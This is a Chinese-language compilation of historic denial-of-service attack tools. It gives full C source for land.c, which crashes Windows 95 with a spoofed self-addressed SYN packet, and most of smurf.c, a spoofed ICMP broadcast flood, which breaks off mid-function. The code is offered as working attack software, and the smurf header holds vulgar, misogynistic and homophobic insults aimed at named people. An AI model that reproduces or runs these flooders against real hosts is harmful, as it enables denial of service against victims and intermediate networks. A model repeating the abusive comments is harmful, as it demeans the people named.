以前常用的攻擊軟件源代碼  
Abstract
這里有一些是老的，現在看來并沒有用，但他們都很有名。

1 Land

攻擊一臺Win95的機器。這是Win95的一個漏洞，以其IP地址和端口向自
己的同一個端口發起連接（發SYN），Win95即會崩潰。


/* land.c by m3lt, FLC
crashes a win95 box */

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

//用于TCP校驗和的偽頭
struct pseudohdr
{
struct in_addr saddr;
struct in_addr daddr;
u_char zero;
u_char protocol;
u_short length;
struct tcphdr tcpheader;
};

//計算IP校驗和
u_short checksum(u_short * data,u_short length)
{
register long value;
u_short i;

for(i=0;i<(length>>1);i++)
value+=data[i];

if((length&1)==1)
value+=(data[i]<<8);

value=(value&65535)+(value>>16);

return(~value);
}


int main(int argc,char * * argv)
{
struct sockaddr_in sin;
struct hostent * hoste;
int sock;
char buffer[40];
struct iphdr * ipheader=(struct iphdr *) buffer;
struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));
struct pseudohdr pseudoheader;

fprintf(stderr,"land.c by m3lt, FLC\n");

if(argc<3)
{
fprintf(stderr,"usage: %s IP port\n",argv[0]);
return(-1);
}

bzero(&sin,sizeof(struct sockaddr_in));
sin.sin_family=AF_INET;

if((hoste=gethostbyname(argv[1]))!=NULL)
bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);
else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
{
fprintf(stderr,"unknown host %s\n",argv[1]);
return(-1);
}

if((sin.sin_port=htons(atoi(argv[2])))==0)
{
fprintf(stderr,"unknown port %s\n",argv[2]);
return(-1);
}

//new一個SOCK—RAW以發偽造IP包 這需要root權限
if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
{
fprintf(stderr,"couldn't allocate raw socket\n");
return(-1);
}

bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->version=4;
ipheader->ihl=sizeof(struct iphdr)/4;
ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->id=htons(0xF1C);
ipheader->ttl=255;
ipheader->protocol=IP_TCP;

//目的IP地址和源IP地址相同
ipheader->saddr=sin.sin_addr.s_addr;
ipheader->daddr=sin.sin_addr.s_addr;

//目的TCP端口和源TCPIP端口相同
tcpheader->th_sport=sin.sin_port;
tcpheader->th_dport=sin.sin_port;
tcpheader->th_seq=htonl(0xF1C);
tcpheader->th_flags=TH_SYN;
tcpheader->th_off=sizeof(struct tcphdr)/4;
tcpheader->th_win=htons(2048);

bzero(&pseudoheader,12+sizeof(struct tcphdr));
pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.protocol=6;
pseudoheader.length=htons(sizeof(struct tcphdr));
bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));

if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr),
0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
{
fprintf(stderr,"couldn't send packet\n");
return(-1);
}

fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]);

close(sock);
return(0);
}


2 Smurf
smurf攻擊是很簡單的，它有一些IP（廣播地址）地址列表，發出了一些偽造的數
據包（ICMP echo request）從而導致一場廣播風暴，可以使受害主機（使它成為偽造包
的源地址）崩潰。

受害者有兩種：中間的設備（bounce sites 交換機或路由器）和被偽裝的IP（那些
icmp echo的包都被發給它）。這種攻擊依賴于路由器把一個廣播地址轉化為一廣播楨
（如Ethernet, FF:FF:FF:FF:FF:FF），RFC中允許這種轉換，但在今天看來是不需要的。

可以使你router停止轉換第三層的廣播（IP）到第二層的廣播（Ethernet）。

但是Smb服務器或NT需要遠程廣播使LAN知道它的存在，但在路由器的上述配置會使這變
成不可能（沒有WINS服務器時）。

/*
*
* $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $
*
* spoofs icmp packets from a host to various broadcast addresses resulting
* in multiple replies to that host from a single packet.
*
* mad head to:
* nyt, soldier, autopsy, legendnet, #c0de, irq for being my guinea pig,
* MissSatan for swallowing, napster for pimping my sister, the guy that
* invented vaseline, fyber for trying, knowy, old school #havok, kain
* cos he rox my sox, zuez, toxik, robocod, and everyone else that i might
* have missed (you know who you are).
*
* hi to pbug, majikal, white_dragon and chris@unix.org for being the sexy
* thing he is (he's -almost- as stubborn as me, still i managed to pick up
* half the cheque).
*
* and a special hi to Todd, face it dude, you're f*ing awesome.
*
* mad anal to:
* #madcrew/#conflict for not cashing in their cluepons, EFnet IRCOps
* because they plain suck, Rolex for being a twit, everyone that
* trades warez, Caren for being a lesbian hoe, AcidKill for being her
* partner, #cha0s, sedriss for having an ego in inverse proportion to
* his penis and anyone that can't pee standing up -- you don't know what
* your missing out on.
*
* and anyone thats ripped my code (diff smurf.c axcast.c is rather
* interesting).
*
* and a HUGE TWICE THE SIZE OF SOLDIER'S FUCK TO AMM FUCK YOU to Bill
* Robbins for trying to steal my girlfriend. Not only did you show me
* no respect but you're a manipulating prick who tried to take away the
* most important thing in the world to me with no guilt whatsoever, and
* for that I wish you nothing but pain. Die.
*
* disclaimer:
* I cannot and will not be held responsible nor legally bound for the
* malicious activities of individuals who come into possession of this
* program and I refuse to provide help or support of any kind and do NOT
* condone use of this program to deny service to anyone or any machine.
* This is for educational use only. Please Don't abuse this.
*
* Well, i really, really, hate this code, but yet here I am creating another
* disgusting version of it. Odd, indeed. So why did I write it? Well, I,
* like most programmers don't like seeing bugs in their code. I saw a few
* things that should have been done better or needed fixing so I fixed
* them. -shrug-, programming for me as always seemed to take the pain away
* ...
*
*
*/

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

void banner(void);
void usage(char *);
void smurf(int, struct sockaddr_in, u_long, int);
void ctrlc(int);
unsigned short in_chksum(u_short *, int);

/* stamp */
char id[] = "$Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $";

int main (int argc, char *argv[])
{
struct sockaddr_in sin;
struct hostent *he;
FILE *bcastfile;
int i, sock, bcast, delay, num, pktsize, cycle = 0, x;
char buf[32], **bcastaddr = malloc(8192);

banner();
signal(SIGINT, ctrlc);

if (argc < 6) usage(argv[0]);

if ((he = gethostbyname(argv[1])) == NULL) {
perror("resolving source host");
exit(-1);
}
memcpy((caddr_t)&sin.sin_addr, he->h_addr, he->h_length);
sin.sin_family = AF_INET;
sin.sin_port = htons(0);

num = atoi(argv[3]);
delay = atoi(argv[4]);
pktsize = atoi(argv[5]);

if ((bcastfile = fopen(argv[2], "r")) == NULL) {
perror("opening bcast file");
exit(-1);
}
x = 0;
while (!feof(bcastfile)) {
fgets(buf, 32, bcastfile);
if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0])) continue;
for (i = 0; i < strlen(buf); i++)
if (buf[i] == '\n') buf[i] = '\0';
bcastaddr[x] = malloc(32);
strcpy(bcastaddr[x], buf);
x++;
}
bcastaddr[x] = 0x0;
fclose(bcastfile);

if (x == 0) {
fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]);
exit(-1);
}
if (pktsize > 1024) {
fprintf(stderr, "ERROR: packet size must be < 1024\n\n");
exit(-1);
}

if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("getting socket");
exit(-1);
}
setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *)&bcast, sizeof(bcast));

printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]);

for (i = 0; i < num || !num; i++) {
if (!(i % 25)) { printf("."); fflush(stdout); }
smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize);
cycle++;
if (bcastaddr[cycle] == 0x0) cycle = 0;
usleep(delay);
}
puts("\n\n");
return 0;
}

void banner (void)
{
puts("\nsmurf.c v4.0 by TFreak\n");
}

void usage (char *prog)
{
fprintf(stderr, "usage: %s "
" \n\n"
"target = address to hit\n"
"bcast file = file to read broadcast addresses from\n"
"num packets = number of packets to send (0 = flood)\n"
"packet delay = wait between each packet (in ms)\n"
"packet size = size of packet (< 1024)\n\n", prog);
exit(-1);
}

void smurf (int sock, struct sockaddr_in sin, u_long dest, int psize)
{
struct iphdr *ip;
struct icmphdr *icmp;
char *packet;

packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
ip = (struct iphdr *)packet;
icmp = (struct icmphdr *) (packet + sizeof(struct iphdr));

memset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);

ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
ip->ihl = 5;
ip->version = 4;
ip->ttl = 255;
ip->tos = 0;
ip->frag_off = 0;
ip->protocol = IPPROTO_ICMP;
ip->saddr = sin.sin_addr.s_addr;
ip->daddr = dest;
ip->check = in_chksum((u_short *)ip, sizeof(struct iphdr));
icmp->type = 8;
icmp->code = 0;
icmp->checksum = in_chksum((u_short *)icmp, sizeof(struct icmphdr) + psize);

sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize,
0, (struct sockaddr *)&sin, sizeof(struct sockaddr));

free(packet); /* free willy! */
}

void ctrlc (int ignored)
{
puts("\nDone!\n");
exit(1);
}

unsigned short in_chksum (u_short *addr, int len)
{